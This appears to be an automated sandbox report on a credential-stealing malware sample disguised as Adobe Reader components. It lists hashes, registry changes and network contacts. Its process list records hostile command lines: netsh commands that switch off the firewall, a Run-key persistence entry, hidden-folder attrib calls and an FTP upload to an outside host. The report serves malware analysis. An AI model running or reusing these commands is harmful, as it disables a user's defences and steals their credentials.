memory/1940-185-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1940-184-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1940-191-0x0000000002710000-0x000000000291C000-memory.dmp
memory/1496-193-0x0000000002440000-0x00000000026F7000-memory.dmp
memory/1496-194-0x0000000002440000-0x00000000026F7000-memory.dmp
memory/1940-198-0x0000000002710000-0x000000000291C000-memory.dmp
memory/1644-200-0x0000000000400000-0x00000000006B7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | b5f36cd4b0866e16d339a2e41bb999ac |
| SHA1 | a4affcd4157f2235f33048063b12c79b38dea5f6 |
| SHA256 | 0bdbf036b9e4938bc826f733630aaef13c7362a4d33e55c24a1640f89a5b53fa |
| SHA512 | d87cf55e0c4308a2bcca90e89b70a19f8e256603f621e6587278ade80e85a0fc40bb1c1ea137d067ac195c9aae9aa541af3e6d0680fdf8ae7a3f09bb0bc3051b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-12 03:23
Reported
2024-09-12 03:25
Platform
win10v2004-20240802-en
Max time kernel
142s
Max time network
144s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\12.0.0.0\RuntimeVersion = "v2.0.50727" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Application Class" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Assembly = "Microsoft.Office.Interop.OneNote, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\LocalServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\LocalServer32\ = "C:\\Program Files\\Microsoft Office\\Root\\Office16\\ONENOTE.EXE" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "OneNote.Application.12" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib\ = "{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\RuntimeVersion = "v2.0.50727" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\12.0.0.0 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\12.0.0.0\Assembly = "Microsoft.Office.Interop.OneNote, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\12.0.0.0\Class = "Microsoft.Office.Interop.OneNote.ApplicationClass" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Class = "Microsoft.Office.Interop.OneNote.ApplicationClass" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe
"C:\Users\Admin\AppData\Local\Temp\f881941f711f3d797027dede73b477345f361838d24bf08e558f11db0f58cd19.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 3599c797ad0bf899791bfa24413c3ab6 |
| SHA1 | 215a520638bb3f1336f268d1acc1170bf2ce0768 |
| SHA256 | 0a9963eefd15805efaef32bf961b354fc255a5a23b4d466aa8e94df53a3c3e8c |
| SHA512 | add003202c97629f2d87d4b7f1876d79dc1ae35cfc85fc55e578adbc3cc009e41ca42c66f33521acb5d8a651fe31d69de5699af1df82ada8227bbeeddbe8d5d1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 3351585db91521d6fa543490ac7cd6a5 |
| SHA1 | 9be2b3abf17613d7386f9949cabaedd466902e82 |
| SHA256 | 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4 |
| SHA512 | 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 75a35514185cd2c5cf5aab50cc380963 |
| SHA1 | f1ff1e088f910398a48f4f7dfddec24e6d6d1734 |
| SHA256 | 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937 |
| SHA512 | ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
memory/4928-53-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2604-57-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2604-59-0x0000000002AC0000-0x0000000002CCC000-memory.dmp
memory/2604-63-0x0000000002AC0000-0x0000000002CCC000-memory.dmp
memory/2604-70-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2604-71-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2604-73-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2604-72-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2604-74-0x0000000002AC0000-0x0000000002CCC000-memory.dmp
memory/2604-77-0x0000000002AC0000-0x0000000002CCC000-memory.dmp
memory/2604-85-0x0000000002AC0000-0x0000000002CCC000-memory.dmp
memory/4928-86-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2724-90-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/4908-94-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/4908-96-0x00000000029C0000-0x0000000002BCC000-memory.dmp
memory/4908-100-0x00000000029C0000-0x0000000002BCC000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | c2f09542b6c7daf4288f3524c8cebb18 |
| SHA1 | 9430b21baf07f0d105b9ee5fdd9f868418454517 |
| SHA256 | 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4 |
| SHA512 | dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672 |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | 9354c939403ff7a4a0c994c93ceafc76 |
| SHA1 | 04206f86c12620ceb00c831d74f14f8abad7772a |
